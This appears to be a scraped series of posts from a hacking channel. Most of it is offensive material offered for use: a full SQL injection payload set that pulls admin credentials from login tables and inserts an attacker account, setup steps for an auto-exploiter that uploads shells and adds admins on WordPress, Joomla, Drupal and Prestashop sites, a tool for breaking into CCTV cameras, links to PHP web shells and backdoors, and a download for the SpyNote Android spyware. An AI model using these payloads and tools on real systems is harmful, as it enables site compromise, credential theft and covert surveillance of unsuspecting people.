▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑ASP+PHP standard SQL injection statement (full version)

1)) Determine whether there is an injection point
'; and 1=1 and 1=2

2)) Guess the name of the general table is nothing more than admin adminuser user pass password etc...
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) --- judge whether The admin table exists

3)) Guess the number of accounts. If you encounter 0< return to the correct page 1< return to the error page, the number of accounts is 1
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)

4)) Guess the field name and add the field name we think of in the len() brackets.
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(user field name)>0)
and 1=(select count(*) from admin where len(password field name password)>0)

5)) Guess the length of each field. Guess the length is to change> 0 until the correct page is returned.

and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6)
and 1=(select count(*) from admin where len(name)>5)
and 1=(select count(*) from admin where len(name)=6)

and 1=(select count(*) from admin where len(password)>11)
and 1=(select count(*) from admin where len(password)>12)
and 1=(select count(*) from admin where len(password)=12)


6)) Guess the character

and 1=(select count(*) from admin where left(name,1)='a') ---

and 1=(select count(*) from admin where left(name,2)='ab')--

Just add one character at a time and guess like this, and guess how many digits you just guessed, and the account number will be calculated.
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --

🦑the result is converted into characters.

'group by users.id having 1=1--
'group by users.id, users.username, users.password, users.privs having 1=1--
'; insert into users values( 666, 'attacker', 'foobar', 0xffff )--

UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'-
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id')-
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id','login_name')-
UNION SELECT TOP 1 login_name FROM logintable-
UNION SELECT TOP 1 password FROM logintable where login_name='Rahul'--
Look at the server patch = something went wrong and SP4 patch was applied
and 1=(select @@VERSION)--
Look at the permissions of the database connection account and return to normal, which proves to be the server role sysadmin permissions.
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))--

Determine the connection database account. (Using the SA account to connect and return to normal = prove that the connected account is SA)

and 'sa'=(SELECT System_user)--
and user_name()='dbo'--
and 0<>(select user_name()--

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

time is up for vote- courses wins then webhacking :)
nice

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑web-hacking ICG-AutoExploiterBoT

F E A T U R E S :

A) OsCommerce Exploits

- OsCommerce 2.x Core RCE

B) Drupal Exploits
- Drupal Add admin
- Drupal BruteForcer
- Drupal Geddon2 Exploit - Upload shell + Index
- CVE-2019-6340 Drupal8 RCE Exploit

C) Joomla Exploits 💥

- Joomla BruteForcer
- RCE joomla 1.x < 3.x
- Add Admin joomla 0day 3.x
- JCE Index + upload Shell Priv8
- jdownloads index + shell priv8
- com_media Index
- Com_fabrik index + Shell priv8
- com_alberghi Index
- Com_AdsManager index + Shell priv8 Method
- Com_MyBlog Index
- Com_CCkJseblod Config Download
- Com_Macgallery Config Download
- Com_Joomanager Config download
- Com_Hdflvplayer Config Download
- Com_s5_media_player Config Download
- Com_FoxContact UploadShell + Index
- Com_Jbcatalog Upload Index & Shell
- Com_SexyContactform Upload Index & Shell
- Com_rokdownloads Upload Index & Shell
- Com_extplorer Upload Index & Shell
- Com_jwallpapers Upload Index & Shell
- Com_facileforms Upload Index & Shell

D) Wordpress Exploits 💥

- Wp 4.7 Content Injection
- Revslider css Index + Config + Shell Upload
- wp-user-frontend Exploit
- gravity-forms Exploit
- HD-webplayer Exploit
- wysija Exploit
- pagelines Exploit
- Headwaytheme Exploit
- addblockblocker Exploit
- cherry-plugin Exploit
- formcraft Exploit
- userpro take ADmin panel wordpress [priv8] Exploit
- wp-mobile-detector Exploit
- wp-job-manager Exploit
- woocomerce Exploit
- viral-optins Exploit
- Wordpress Downloads-Manager Exploit Upload shell + Index
- Wordpress Category-Page-icons Exploit
- wp_support_plus_responsive_ticket_system Download Config
- wp_miniaudioplayer Download Config
- eshop_magic Download Config
- ungallery Download Config
- barclaycart Upload Index & Shell
- Wordpress BruteForce
- Wordpres wp gdpr compliance Plugin Exploit

E) Prestashop Exploits 💥

- lib Prestashop Module Exploit
- psmodthemeoptionpanel Prestashop Module Exploit
- tdpsthemeoptionpanel Prestashop Module Exploit
- megamenu Prestashop Module Exploit
- nvn_export_orders Prestashop Module Exploit
- pk_flexmenu Prestashop Module Exploit
- wdoptionpanel Prestashop Module Exploit
- fieldvmegamenu Prestashop Module Exploit
- wg24themeadministration Prestashop Module Exploit
- videostab Prestashop Module Exploit
- cartabandonmentproOld Prestashop Module Exploit
- cartabandonmentpro Prestashop Module Exploit
- advancedslider Prestashop Module Exploit
- attributewizardpro_x Prestashop Module Exploit
- attributewizardpro3 Prestashop Module Exploit
- attributewizardpro2 Prestashop Module Exploit
- attributewizardpro Prestashop Module Exploit
- jro_homepageadvertise Prestashop Module Exploit
- homepageadvertise2 Prestashop Module Exploit
- homepageadvertise Prestashop Module Exploit
- productpageadverts Prestashop Module Exploit
- simpleslideshow Prestashop Module Exploit
- vtermslideshow Prestashop Module Exploit
- soopabanners Prestashop Module Exploit
- soopamobile Prestashop Module Exploit
- columnadverts Prestashop Module Exploit

E) ) Opencart Exploits 💥

- Opencart BruteForce

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) dowload https://github.com/04x/ICG-AutoExploiterBoT

2) heavyexclamationmark: Edit Line 46 Add your Email Address for Add admin joomla Exploit ( Use outlook.com Mail! ) :heavycheckmark:

ENJOY ❤️👍🏻
WRITTEN BY
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

fresh proxies detailed list

https://pastebin.com/VTXvDhmx

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑This program needs to hack IP cameras CCTV in the world. For setup you need to write these commands in #termux

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽:

1) apt-get install python3

2) apt-get install git

3) git clone https://github.com/yan4ikyt/webhack

4) cd webhack

5) pip3 install requests

6) python3 WebHack.py

7) choose option

#fastTips
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑PHP #Shell new list :

* [Simple Shell](https://github.com/backdoorhub/shell-backdoor-list/blob/master/shell/php/simple-shell.php)

* [B374K Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/b374k.php)

* [C99 Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/c99.php)

* [R57 Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/r57.php)

* [Wso Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/wso.php)

* [0byt3m1n1 Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/0byt3m1n1.php)

* [Alfa Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/alfa.php)

* [AK-47 Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/ak47shell.php)

* [Indoxploit Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/indoxploit.php)

* [Marion001 Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/ak47shell.php)

* [Mini Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/mini.php)

* [p0wny-shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/p0wny-shell.php)

* [Sadrazam Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/sadrazam.php)

* [Webadmin Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/webadmin.php)

* [Wordpress Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/wordpress.php)

* [LazyShell](https://github.com/joeylane/Lazyshell.php/blob/master/lazyshell.php)

✅top git
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

#tips & tricks

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What can SpyNote do?

SpyNote is actually a tool used to create Android malicious programs. Recently, it has been particularly popular in many malicious program forums. It has some quite attractive features:


· No need to obtain system root permissions;

· Monitor the call;

· Steal contacts and information data;

· Record sound through microphone;

· Malicious calls;

· Install malicious applications;

· Obtain the IMEI code, WiFi MAC address, and wireless network operator details of the mobile phone;

· Get ​​the latest GPS location information of the device;

· Control the camera

🦑DOWNLOAD APK https://github.com/cymilad/SpyNote

enjoy❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

The EU may delay the tech giant 's inquiry into data misuse in the Twitter case #international

updates @UndercodeNews

2020 fortnite dorks

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Steps to crack BAT batch source code in pseudo EXE:

1) First of all, double-click the program to run, do not close, some programs will KillSelf when they are closed;

2) Secondly, cd %temp% under CMD. At the beginning, I used dir *.bat and did not find it. At this time, you have to think that it may be a .cmd file, so you can try dir *.cmd, but there is no result;

3) 　　Finally, copy the found BAT and right-click "Edit" to see the source code. The source code is as follows:


@echo off
title [One-key clearing of print tasks] BY: wnsdt
color 2f
echo.&echo.&echo.
echo Description (2011.10.11):
echo.&echo.
echo This tool can quickly clear unresponsive printing tasks and solve problems that cannot be printed problem!
echo.
echo If you connect to a printer shared on the network, please run this tool on that computer!
echo.&echo.
echo --------------------------------------------- -------------------
echo.
Echo leave a message on Weibo if there is a problem <a href="http://t.qq.com/wnsdt_kk">http:// t.qq.com/wnsdt_kk</a>
echo.&echo.&echo.&echo.&echo.&echo.
echo Press any key to start, exit, please close
pause>nul 2>nul
cls
echo.&echo.&echo.&echo.&echo. &echo.
echo will be cleaned up later, please print again...

net stop spooler>nul 2>nul
del %systemroot%\System32\spool\PRINTERS\*.* /q /s /f>nul 2>nul
sc config spooler start= auto>nul 2>nul
net start spooler>nul 2 >nul
exit


Written @UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#fastTips full webHacking via windows :
The OWASP Zed Attack Proxy (ZAP) is one of the world’s most popular free security tools and is actively maintained by a dedicated international team of volunteers. It can help you automatically find security vulnerabilities in your web applications while you are developing and testing your applications. It's also a great tool for experienced pentesters to use for manual security testing.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽:

1) download https://www.zaproxy.org/download/

2) run the setup

3) use for learn

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁